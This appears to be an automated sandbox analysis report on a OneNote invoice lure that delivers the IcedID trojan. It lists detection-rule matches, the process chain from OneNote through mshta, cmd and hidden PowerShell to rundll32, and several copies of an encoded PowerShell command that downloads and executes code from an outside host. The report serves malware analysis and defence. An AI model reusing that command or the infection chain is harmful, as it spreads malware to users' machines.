            Source: 00000004.00000003.420275209.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000001.00000003.312205007.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000004.00000002.430208816.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
            Source: 00000004.00000002.430208816.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
            Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
            Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
            Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
            Source: 00000004.00000002.433111959.0000000004E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
            Source: 00000004.00000002.433111959.0000000004E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000001.00000003.311641542.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
            Source: 00000001.00000003.311641542.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000001.00000002.313533229.0000000001006000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
            Source: 00000001.00000002.313533229.0000000001006000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
            Source: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
            Source: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
            Source: 00000001.00000002.313384693.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000004.00000003.391815288.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000004.00000002.431747574.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000004.00000002.430799760.0000000000958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000004.00000002.430489689.0000000000880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000001.00000003.311100035.000000000101A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
            Source: 00000001.00000003.311100035.000000000101A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 0000000A.00000002.836565283.0000017523534000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
            Source: 00000004.00000002.453050206.0000000006E88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
            Source: 00000001.00000002.313116250.0000000000E35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
            Source: 00000001.00000002.313116250.0000000000E35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000001.00000003.311641542.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000004.00000002.430799760.0000000000950000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
            Source: 00000004.00000002.430799760.0000000000950000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000001.00000003.312521057.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000001.00000003.311100035.0000000001006000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
            Source: 00000001.00000003.311100035.0000000001006000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000001.00000002.313533229.000000000101A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
            Source: 00000001.00000002.313533229.000000000101A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000004.00000002.433111959.0000000004E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
            Source: 00000004.00000002.433111959.0000000004E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000001.00000003.312537602.0000000000F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000001.00000002.313356114.0000000000F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000004.00000002.430799760.00000000009F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: Process Memory Space: rundll32.exe PID: 5848, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
            Source: C:\Users\user\AppData\Local\Temp\{A7DEC174-262B-4913-BE2F-051CB37BE409}, type: DROPPEDMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
            Source: C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000054.bin, type: DROPPEDMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
            Source: C:\Users\user\AppData\Local\Temp\{693D2051-0F19-48F6-B744-37E31A4E8C6E}.bin, type: DROPPEDMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0766F6104_2_0766F610
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_076678604_2_07667860
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_076678604_2_07667860
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07809E084_2_07809E08
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078038A04_2_078038A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078027514_2_07802751
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078027604_2_07802760
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0780C5E84_2_0780C5E8
            Source: C:\Windows\System32\rundll32.exeCode function: 10_3_0000017523520A5810_3_0000017523520A58
            Source: C:\Windows\System32\rundll32.exeCode function: 10_3_0000017523520E3C10_3_0000017523520E3C
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800F800010_2_00000001800F8000
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018000140010_2_0000000180001400
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018003DC1010_2_000000018003DC10
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018003841010_2_0000000180038410
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018000741010_2_0000000180007410
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018004242010_2_0000000180042420
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018005183010_2_0000000180051830
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018000286010_2_0000000180002860
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018003FC8010_2_000000018003FC80
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018001F8C010_2_000000018001F8C0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018002A0D010_2_000000018002A0D0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800438E010_2_00000001800438E0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018000C0E010_2_000000018000C0E0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800080F010_2_00000001800080F0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180013D2010_2_0000000180013D20
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018000157010_2_0000000180001570
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800F658010_2_00000001800F6580
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800A718010_2_00000001800A7180
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018000219010_2_0000000180002190
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800241C010_2_00000001800241C0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800229E010_2_00000001800229E0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800EF9F010_2_00000001800EF9F0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018003921010_2_0000000180039210
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018004022010_2_0000000180040220
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018002965010_2_0000000180029650
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180003E5A10_2_0000000180003E5A
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180010A8010_2_0000000180010A80
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180004A8010_2_0000000180004A80
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018000AEA010_2_000000018000AEA0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800036A010_2_00000001800036A0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018000EEA010_2_000000018000EEA0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018000A2E010_2_000000018000A2E0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800112F010_2_00000001800112F0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018003C30010_2_000000018003C300
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018000772010_2_0000000180007720
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800EF74010_2_00000001800EF740
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018003BF4010_2_000000018003BF40
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018000FF5010_2_000000018000FF50
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180023F6010_2_0000000180023F60
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180038F9010_2_0000000180038F90
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000000018003F7A010_2_000000018003F7A0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180043FC010_2_0000000180043FC0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800267E010_2_00000001800267E0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000017523531BC810_2_0000017523531BC8
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180044BF0 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,10_2_0000000180044BF0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180042420 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetSystemInfo,10_2_0000000180042420
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00000001800400E0 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,10_2_00000001800400E0
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_0000000180043390 NtQueryVirtualMemory,NtQueryVirtualMemory,GetLastError,GetSystemInfo,10_2_0000000180043390
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_000001752353227C NtQuerySystemInformation,RtlAllocateHeap,10_2_000001752353227C
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Inv_02_02_#6.one
            Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\MZvYng.bin,init
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\MZvYng.bin,init
            Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsrJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\MZvYng.bin,initJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\MZvYng.bin,initJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
            Source: Send to OneNote.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
